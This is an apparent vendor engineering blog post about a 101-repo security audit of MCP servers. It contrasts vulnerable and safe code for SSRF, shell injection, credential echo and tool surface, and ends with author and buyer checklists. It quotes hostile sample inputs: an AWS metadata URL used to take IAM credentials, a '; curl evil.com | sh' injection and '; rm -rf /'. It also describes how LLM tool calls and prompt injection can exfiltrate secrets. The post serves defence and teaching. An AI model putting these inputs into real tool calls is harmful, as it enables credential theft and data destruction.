Engineering · 2026-04-30
Anatomy of an A-grade MCP server — five code patterns shared by the 19 that passed our 101-repo audit
Of the 101 community Model Context Protocol servers we audited in April 2026, exactly 19 earned an A and two earned a perfect 100. Reading their source side by side against the 42 F-grade repos and the 38 C-grade repos, the patterns that separate the A set are not heroic security engineering — they are five boring habits, repeated across language and framework choice. None of them are about what the MCP server does; all of them are about how its handlers are written. This post names the five, shows the bad-vs-good code shapes for each, and walks the two perfect-100 repos to explain what they do that the other seventeen A's don't. Companion to the F-grades post. If you are an indie author who wants the SkillAudit badge on your README this week, the checklist at the bottom is for you.
What "A" means under the SkillAudit rubric
SkillAudit grades every Model Context Protocol server (and Claude skill) on six axes — security, permissions, credentials, maintenance, compatibility, and documentation. Each axis is scored 0–100 against the published rubric. The overall grade is the floor of the worst axis, with security weighted as the gating axis: a security score of 70 caps overall grade at 70 regardless of any other axis. Letter buckets are A 90+, B 80–89, C 70–79, D 60–69, F < 60.
Earning an A requires two things simultaneously. First, every axis lands at 90 or above. Second, after the v0.3 calibration update — see the calibration delta post — no HIGH-severity finding lands on a production source path. Findings in tests/, examples/, benchmarks/, top-level scripts/, and .claude-plugin/install* code paths deduct at reduced weight (the surface-tier rubric documents how a path is classified), so a chatty test directory cannot tank an otherwise-clean MCP. But a single high-severity SSRF or command-exec on a runtime tool surface is sufficient to break out of the A bucket.
The asymmetry matters: an A grade is not a grade for absence of findings. It is a grade for absence of production high-severity findings, with low-severity warns tolerated. Microsoft Playwright (90/100) is the canonical example — it has two high-severity execSync findings, but both live in tests/cli.spec.ts and tests/library.spec.ts, which surface-tier as test code and deduct only −5 each. The MCP runtime itself does not do command execution, which is what the rubric is grading.
Across the 19 A's, the score distribution is:
| Repo | Stars | Days since push | Tier | Score |
|---|---|---|---|---|
| langchain-ai/langchain-mcp-adapters | 3,498 | 1 | Framework | 100 |
| vectara/vectara-mcp | 27 | 140 | Vector DB | 100 |
| microsoft/playwright-mcp | 31,354 | 1 | Browser | 90 |
| tadata-org/fastapi_mcp | 11,819 | 150 | Framework | 90 |
| mendableai/firecrawl-mcp-server | 6,127 | 1 | Web fetch | 90 |
| exa-labs/exa-mcp-server | 4,304 | 0 | Search | 90 |
| elevenlabs/elevenlabs-mcp | 1,328 | 34 | Voice | 90 |
| qdrant/mcp-server-qdrant | 1,363 | 23 | Vector DB | 90 |
| nickclyde/duckduckgo-mcp-server | 1,027 | 46 | Search | 90 |
| ClickHouse/mcp-clickhouse | 759 | 0 | Operational DB | 90 |
| zcaceres/fetch-mcp | 740 | 42 | Web fetch | 90 |
| redis/mcp-redis | 490 | 1 | Operational DB | 90 |
| Snowflake-Labs/snowflake-mcp | 276 | 11 | Operational DB | 90 |
| zilliztech/mcp-server-milvus | 229 | 121 | Vector DB | 90 |
| meilisearch/meilisearch-mcp | 185 | 105 | Search | 90 |
| box-community/mcp-server-box | 100 | 142 | Files | 90 |
| appwrite/mcp | 66 | 13 | Backend | 90 |
| pinecone-io/pinecone-mcp | 64 | 8 | Vector DB | 90 |
| Couchbase-Ecosystem/mcp-server-couchbase | 31 | 0 | Operational DB | 90 |
The star count, days-since-push, and tier dimensions are uncorrelated with the grade. A 27-star repo (Vectara) and an 11,819-star repo (FastAPI-MCP) sit on the same shortlist alongside Microsoft. What they share is not popularity or activity — it is a small set of code-shape decisions that the engine reads for. Below: those decisions, named.
Pattern 1 — No fetch(url) from a tool argument without an allowlist
What the engine looks for
The first SkillAudit security check walks every .js / .ts / .py file under production paths and looks for HTTP-client primitives — fetch, axios.get, axios.post, requests.get, urllib.request.urlopen, etc. — where the URL argument is a variable that traces back to the tool handler's input. The static analysis is a tree shape: function tool_handler(args) → some path → fetch(args.url) with no validation between them. If the engine cannot prove validation, it flags HIGH.
// punkpeye/fastmcp src/DiscoveryDocumentCache.ts:101 — F grade
async getDocument(url: string): Promise<Document> {
const response = await fetch(url, { headers: { Accept: 'application/json' } });
return response.json();
}
The url parameter is passed in from a tool handler. The host is not validated against an allowlist. An LLM tool call with url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/" hits AWS instance metadata and exfiltrates the IAM role credentials in the response.
// exa-labs/exa-mcp-server — A grade
const exa = new Exa(apiKey);
const results = await exa.searchAndContents(query, {
numResults: 5,
text: true
});
The Exa MCP server does not call fetch with user-supplied URLs at all. The query argument flows into a typed SDK call that hits a single fixed host (api.exa.ai). The same shape covers Pinecone, Qdrant, Milvus, Vectara, Meilisearch, Redis, ClickHouse, Couchbase, Snowflake, Appwrite, Box, ElevenLabs, FireCrawl, and DuckDuckGo — every A-grade vendor SDK MCP. The vendor SDK is the allowlist: there is no code path inside the MCP that lets a tool argument become a fetch destination.
// zcaceres/fetch-mcp src/Fetcher.ts:64 — A grade (warn-level finding only)
const response = await fetch(url, {
headers: this.getHeaders(requestPayload),
});
// SkillAudit notes: validation markers present in surrounding code; flagged WARN, not HIGH.
The fetch-mcp repo is a web-fetch MCP — its job is to fetch user-supplied URLs. It cannot avoid the fetch(url) shape. What keeps it at A is the surrounding code: the engine identifies validation markers (URL parsing, hostname checks, redirect handling) close to the call site and downgrades the severity from HIGH to WARN. The deduction drops from −30 to −10, which still leaves the security axis at 90. The trust assumption is documented in the README — buyers know what they are installing.
Pattern 2 — No exec / execSync / spawn shell:true with template-string argv
What the engine looks for
The second security check walks for child_process.exec, child_process.execSync, spawn(..., { shell: true }), os.system, and subprocess.run(..., shell=True) with a string argument that contains a template interpolation. If the interpolated value is a tool argument, it is shell-injection — an LLM tool call with filename: "; curl evil.com | sh" escapes the intended command boundary.
// modelcontextprotocol/inspector cli/scripts/make-executable.js — F grade
execSync(`chmod +x ${filePath}`);
The filePath variable comes from a CLI argument (which itself is passable from a tool handler in some downstream wrappers). Because the argv is a template string, a value like "; rm -rf /" is concatenated into the shell command before execSync parses it. The fix is one line: execFileSync('chmod', ['+x', filePath]).
// langchain-ai/langchain-mcp-adapters — A grade, perfect 100 // No child_process imports. No subprocess imports. // Tool calls are pure language-binding adapters — they translate // MCP wire-format messages into LangChain tool invocations and back.
The simplest A-grade pattern is to never spawn a child process at all. LangChain MCP adapters, Vectara, Pinecone, Qdrant, Milvus, ClickHouse, Couchbase, Redis, Snowflake, Meilisearch, Appwrite, Box, Exa, FireCrawl, DuckDuckGo, ElevenLabs, fetch-mcp, and FastAPI-MCP all share this — none of them run shell commands. The MCP server is a thin protocol adapter over a vendor SDK or a network protocol; there is no shell-command surface to misuse.
Good — A-grade pattern (child-process in tests only)// microsoft/playwright-mcp tests/cli.spec.ts:23 — A grade despite finding
const output = child_process.execSync(
`node ${cliPath} install-browser --help`,
{ encoding: 'utf-8' }
);
Microsoft Playwright is the only A-grade repo where execSync with template-string argv exists in the source tree at all — and it is in two test files (tests/cli.spec.ts:23 and tests/library.spec.ts:27). Under v0.3 the test surface tier deducts −5 per HIGH finding instead of −30, so the two findings drop the security axis to 90, not below. The MCP runtime itself never spawns a child process. This is the surface-tier rubric working as intended: real findings counted at the right weight for their context.
Pattern 3 — Credentials read once at process start, never echoed
What the engine looks for
The credentials check walks for any code path where the result of an os.environ.get(...) / process.env.X / os.getenv("X") read flows into a string that ultimately becomes a tool response, an error message, a log line, or an exception body. The pattern catches both straight echoes (return res.status(500).send("Auth failed: " + token)) and indirect ones (logger.error({ apiKey }), where the structured-log writer serializes the whole object into a tool response).
// posthog/mcp typescript/src/api/client.ts — F grade
catch (error) {
console.error(`API request failed: ${error.message}`, {
apiKey: process.env.POSTHOG_API_KEY // echoed into structured log
});
throw error;
}
If the structured logger is wired to a transport that ends up in tool-response context — which is true for many MCP server frameworks where logs are forwarded as resource notifications — the API key leaks to the LLM client. From there it is one prompt-injection turn away from being exfiltrated to an attacker-controlled URL.
Good — A-grade pattern// redis/mcp-redis — A grade
const REDIS_URL = process.env.REDIS_URL;
if (!REDIS_URL) {
throw new Error("REDIS_URL is required"); // no value echoed
}
const client = createClient({ url: REDIS_URL });
The A-grade pattern is to read the env var once at process start, validate that it is present, and pass it directly into the SDK constructor. The error path mentions the variable name but never the value. Every subsequent reference is to the connected client object, not the secret. Pinecone, Qdrant, Milvus, ClickHouse, Couchbase, Snowflake, Appwrite, Box, Exa, FireCrawl, DuckDuckGo, ElevenLabs, Meilisearch, fetch-mcp, FastAPI-MCP, LangChain MCP adapters, and Vectara all share this shape. The handler bodies do not have access to the API key string at all — they have access to a connected client.
The four A-grade repos that include an .env.example file (Vectara, Appwrite, ElevenLabs, Redis) get a low-weight WARN on credentials/examples surface. Because the surface tier is examples, the deduction is 0 — the warn is purely informational. The A grade is unaffected. The engine is reminding maintainers to verify the file is a template, not real secrets — but it is not punishing them for shipping one. The deduction matrix is documented in the methodology page.
Pattern 4 — Narrow tool surface
What the engine looks for
Every server.tool(name, schema, handler) registration (and the Python-decorator equivalent @app.tool(name)) is a public capability surface. Each tool is one entry in the JSON-RPC protocol that the LLM client can invoke. The permissions axis grades the shape of that surface: how many tools, how broad each one is, and whether any tool's argument schema includes free-form fields that could route to dangerous primitives.
Across the 19 A-grade repos, the median tool count is between 4 and 8. None of them ship more than ~12 tools. The tool names are narrow and verb-shaped: search, upsert, query, fetch_url, create_collection. None of them have a tool literally named execute, run, or shell — those names tend to indicate a privilege-escalation path the engine flags HIGH on the permissions axis.
// pinecone-io/pinecone-mcp — A grade
server.tool("describe-index-stats", { /* schema */ }, handler1);
server.tool("query", { /* schema */ }, handler2);
server.tool("upsert-records", { /* schema */ }, handler3);
server.tool("list-indexes", { /* schema */ }, handler4);
server.tool("create-index-for-model",{ /* schema */ }, handler5);
// No tool argument is a free-form URL, file path, or shell command.
The Pinecone MCP exposes five tools. Each one maps cleanly onto a single Pinecone API call. Each schema is a typed object with named fields — index_name as a string with a regex constraint, top_k as a bounded integer, vector as a numeric array. None of them accept an unconstrained string that could become a URL or a shell argument. The blast radius of a tool call is bounded by the Pinecone API itself: an LLM tool call cannot do anything Pinecone's API does not let an authenticated user do.
Compare to the F-grade pattern: a single execute or run_command tool with a free-form string argument. A high-severity permissions finding plus a high-severity command-exec finding stack to drop two axes below the cap. The resulting overall grade is at most C, and usually F.
Pattern 5 — Maintenance signal
What the engine looks for
The maintenance axis pulls metadata from the GitHub API on each scan: days since last push, open-issue count, archived flag, declared license. The compatibility axis reads package.json / pyproject.toml for declared engine versions and Node/Python compatibility ranges. The docs axis measures README size in bytes and looks for a SECURITY.md file.
The 19 A-grade repos all clear:
- Days since last push < 365. Old end of A-grade range is FastAPI-MCP at 150 days; new end is Couchbase at 0 days. Above 365 days, the engine caps maintenance score at 40 (cannot earn A); above 180 days, it caps at 70 (likely C-or-below). Both caps are documented in the methodology meta-checks section.
- Declared engines field present. Every
package.jsonin the A set declares anengines.noderange; everypyproject.tomldeclaresrequires-python. Missing this caps the compatibility axis at 70. - README ≥ 3 KB. A 3 KB README is roughly "install command, env vars, one usage example, license." Below that, the docs axis caps at 70.
- Low open-issue count for the repo size. The two A-grade repos with WARN-level open-issue findings are FireCrawl (104 open issues) and FastAPI-MCP (143 open issues) — both still A because the deduction is WARN on a single axis. Triage backlog is a soft signal of maintenance load, not a hard fail.
The single warn that 17 of 19 A-grade repos share is the same line item: (meta) — No SECURITY.md — no disclosure channel for vulnerabilities. It is a WARN on the docs axis, deducting 10 points to land at 90. The two perfect-100 repos (LangChain MCP adapters and Vectara) are the only ones where the docs axis finds nothing — and both ship a SECURITY.md.
What the two perfect 100s actually do differently
Reading langchain-ai/langchain-mcp-adapters and vectara/vectara-mcp against the seventeen 90/100 repos, the difference is small and specific.
LangChain MCP adapters (100/100, zero findings, 3,498 stars, 1 day since push.) The repo is a pure protocol-adapter library — it converts MCP tool definitions into LangChain Tool objects and routes invocations through MCP StreamableHTTPClientTransport. The implementation has no fetch(url) with user input (the protocol layer below it handles all transport), no child-process calls, no environment-variable echoes (it does not read environment variables at all — the consumer of the library does), a narrow API surface, recent commits, declared engines, ample README, and a SECURITY.md at repo root pointing at LangChain's vulnerability-disclosure email. Every axis returns zero findings. The reason it is 100 is not that it does anything special — it is that it is small enough, focused enough, and well-maintained enough that there is nothing to flag. The lesson for authors: a clean axis is not the same as a complex axis with mitigations; sometimes it is just the absence of the bad pattern entirely.
Vectara (100/100, one low-weight warn, 27 stars, 140 days since push.) Vectara is the more interesting case because it has fewer stars and is older than most of the 90/100 repos. The single finding is (credentials/examples) on a .env.example file — a low-weight WARN at 0-deduct, which is why the score is 100 not 95. The repo ships a real SECURITY.md (no docs WARN), a parameterised query handler (no SSRF), no child-process calls, narrow tool surface (search-and-rag verb-shaped tools only), env-var read once at startup (no credential echo), declared engines, README ≥ 3 KB. The maintenance is below the engine's 180-day soft warn but well above the 365-day hard cap, so the maintenance axis stays at 100. The lesson: a small repo can earn a perfect 100 if it is correct end-to-end, and "correct" does not mean "lots of code" — it means "no bad patterns and a SECURITY.md".
Both perfect-100 repos demonstrate the same point. The 17 repos at 90 are not 90 because they did anything wrong on the security or credentials or permissions axes — they are 90 because they did not ship a vulnerability-disclosure file. Adding a SECURITY.md with a working disclosure email is approximately a 30-line task. Doing it would lift the existing 17 to 100 in the next re-scan.
Why this list is short and boring on purpose
Reading down the patterns, the obvious response is that none of this is a security insight — it is the same advice OWASP, Snyk, and every code-review checklist have been giving for fifteen years. That is the point. The MCP supply-chain has not invented new vulnerabilities; it has invented new surfaces for old vulnerabilities. SSRF in fetch(args.url) is the same SSRF as in a 2010 PHP file-upload form — but the URL now flows from an LLM tool call instead of a HTTP form field, so it is invisible to the DAST and CVE scanners that look for HTTP-shaped surfaces. Command injection in execSync(\`chmod ${path}\`) is the same command injection — but the path argument now comes from an LLM-generated tool invocation, so the threat model has changed even though the code shape has not. Credential echo is the same credential echo — but the structured-log line now ends up in a JSON-RPC tool response that an LLM client can attempt to exfiltrate via a follow-up tool call.
The reason the F-grade corpus is so much larger than the A-grade corpus is not that maintainers do not know these patterns. It is that the static analysis tools they normally rely on — Snyk, Dependabot, OSV-Scanner, GitHub Code Scanning's stock pack — do not fire on these patterns inside MCP tool handlers, because the standard taint-source list is "HTTP request body, query string, header" and not "function argument named args.url on a function that was registered via server.tool(...)." The vulnerabilities are not being introduced by careless code; they are being introduced by the absence of a scanner that recognises the new taint shape. SkillAudit is the scanner that closes that specific gap. The first 52-repo public scan documented the gap; the vendor-official F-grades post showed how it manifests on otherwise-reputable repos; this post documents what the other side of the gap looks like in code.
Author checklist — what to do if your audit comes back C or D
If you are an indie skill or MCP-server author and your SkillAudit grade is below A, walk this checklist. Most of the 38 C-grade repos in our corpus are one or two finding fixes plus a SECURITY.md away from B or A.
- Read your audit page top to bottom. Every finding has a file path, a line number, and a code snippet. Open the file. Look at the surrounding code. Decide whether the finding is real or a false positive — if real, fix it; if a false positive, leave a code comment explaining why (the engine is not adversarial, but the comment helps the maintainer who reads your audit page).
- Fix the production-tier
HIGHfindings first. They deduct −30 each and they cap your security or credentials axis. Two production-tier highs and you are below A regardless of everything else. The single finding moving you from C to A is usually a HIGH on production source. - Decide if any
fetch(url)calls really need to be there. If your MCP wraps a vendor SDK, the SDK should be doing the fetch — your handler should not. If you must fetch user-supplied URLs (you are a fetcher / browser MCP), document the trust assumption in the README and add an explicit hostname allowlist or SSRF-mitigation comment near the call site. The engine reads validation markers and will downgrade HIGH to WARN. - Replace
execwithexecFileeverywhere. If your code shells out at all, the argv-array form is one line away.execSync(\`git log --since=${since}\`)becomesexecFileSync('git', ['log', \`--since=${since}\`]). The latter is invulnerable to command injection by construction. If you genuinely need shell features (pipes, redirects), wrap them in a constant string and pass user input through environment variables that the wrapped command reads. - Audit your error and log paths for env-var echoes. Search your codebase for
process.env/os.environ/os.getenv. Trace each result to its consumers. If any of those consumers reach a tool response, an exception body, or a structured log forwarded into the protocol, fix the path: log the variable name, not the value. - Ship a
SECURITY.md. 30 lines, repo root, naming a disclosure email and a coordinated-disclosure timeline. Lifts the docs axis from 90 to 100 on its own. If 17 of 19 A-grade repos in our corpus would be perfect 100s but for this single missing file, you are unlikely to be different. - Re-run the audit. SkillAudit is reproducible — every audit page links to the exact commit hash and runs the same engine version against any future commit. After your fixes are merged, request a re-scan; the new grade will reflect them.
Buyer checklist — how to read this list against your install decision
If you are a developer or team picking which MCP servers to install this week, the install shortlist covers the buyer-side use case at length. This post complements it with the why: the 19 are on the shortlist because they share the five patterns above. When you encounter a repo not in our 101-corpus, you can run the same five checks yourself in five minutes:
grep -RnE 'fetch\(.*\)|axios\.(get|post)|requests\.(get|post)' src/— does the URL come from a tool argument? If yes, is there validation?grep -RnE 'exec\(|execSync\(|spawn\(.*shell.*true|os\.system|subprocess.*shell=True' src/— any hits in production paths? Look at each one.grep -RnE 'process\.env|os\.environ|os\.getenv' src/— which env vars are read, and do any of them flow into return paths or log lines?- Read the
server.tool(...)/@app.toolregistrations. Is the tool surface narrow and verb-shaped, or is there anexecute/run/shellin there? - Check the README size, the most recent commit date, and whether a
SECURITY.mdexists.
If all five checks pass, the repo is plausibly A-grade and worth running through a real audit for confirmation. If two or more fail, do not install.
FAQ
If 17 of 19 A-grade repos are 90/100 because they lack a SECURITY.md, why isn't the docs axis weighted lower? Because the absence of a disclosure channel is a real maintenance gap, not a paperwork inconvenience. When a vulnerability is found in an MCP server and the discoverer cannot find a disclosure email, the most likely outcomes are public Twitter / X posts, GitHub issues with full reproduction steps, and CVE-grade exposure with no coordinated patch window. The 10-point deduction signals "the maintainer has not made it easy to be told about a problem"; it does not score the code itself. The two perfect-100 repos demonstrate that closing this gap is achievable.
Why doesn't this list include "use TLS" or "validate JSON schema"? Because every MCP server in the corpus already does both — they are protocol-level requirements of MCP itself, not author-discretion choices. The five patterns above are the ones that differ across the corpus; the protocol-mandated requirements are the floor, not the differentiator.
How does the list change if the LLM-assisted prompt-injection probe is enabled? The probe (Claude Haiku 4.5, gated on ANTHROPIC_API_KEY being set on the audit run) reads the first ~60 lines of each tool handler and asks specifically about untrusted-content flow into tool responses. None of the 19 A-grade repos have been probed in this scan because the API key was unavailable; we expect that of the 14 A-grade repos with no tool surface (vendor-SDK-only tools), most will continue to clear at A; of the 5 with active tool handlers (the web fetchers, the search APIs, FastAPI-MCP), some may pick up additional WARN findings on framing-marker absence. None should drop below B unless an unexpected pattern surfaces. We will publish the probe-enabled re-scan delta when the API key is configured.
Does an A grade today guarantee an A tomorrow? No. The audit is point-in-time on a specific commit. Maintenance changes, new tools added with broader argument schemas, regressions in error-path handling, all can drop a grade in a future scan. The right cadence is a 30-day re-scan, which is what the install-gate playbook codifies for team buyers. For authors: re-run SkillAudit before each release and treat a grade drop the same way you would treat a failing test.
What grade-bucket lift would each pattern produce on its own? Roughly: fixing one production-tier HIGH SSRF moves the security axis from 70 to 100 (single-handed C → A on that axis); replacing exec with execFile moves the security axis the same; removing a credential echo moves the credentials axis from 70 to 100; narrowing a tool surface from "execute(cmd)" to a verb-shaped tool moves both permissions and security axes; shipping a SECURITY.md moves the docs axis from 90 to 100. The overall grade is the floor of the worst axis (security-prioritised), so the right order to fix is whichever axis is lowest on your audit page.
Are these patterns specific to TypeScript / JavaScript MCP servers? No. The patterns are language-agnostic. The 19 A-grade repos include TypeScript (LangChain, Microsoft Playwright, Vectara), Python (Pinecone, Qdrant, Milvus, Snowflake, FastAPI-MCP, fetch-mcp, Vectara has Python too), Go (some indirectly), and combinations. The static checks the engine runs are language-aware (different AST shapes for fetch(url) in TS vs requests.get(url) in Python) but the underlying patterns are the same. Maintainers in any language can use the checklist above.
How do I read the audit page for my repo if I don't recognise some of the section headings? The methodology page documents every section. The most important: the surface-tier headings under each axis section show where in the source tree each finding lives. Production sources is the one that drives most of the deduction; everything below (installer, examples, benchmarks, scripts, test) deducts at lower weights and rarely changes the letter grade by itself.
Related reading
- We scanned 52 MCP servers — 56% had SSRF, 44% leaked credentials — the aggregate research findings post that defined the methodology this list builds on.
- 29 vendor-official MCP servers earned an F — every name, every file path — the structural counterpart to this post: the same five patterns, but where they fail.
- The MCP install shortlist — 19 community servers that earn an A — the buyer-side companion that names every A-grade repo with a one-paragraph use-case writeup.
- Block 52 of 101 community MCP servers with one CI gate — the team-lead policy template that gates installs on a minimum SkillAudit grade.
- Engine v0.3 calibration delta — 22 grades moved when surface tiering shipped — the engineering record of the calibration update that defined the production / examples / tests / benchmarks surface tiers used throughout this post.
- Methodology — how SkillAudit grades MCP servers and Claude skills (v0.3) — the canonical rubric, including the deduction matrix and worked examples.
- The public audit board — every grade in the 101-repo corpus, every finding linked.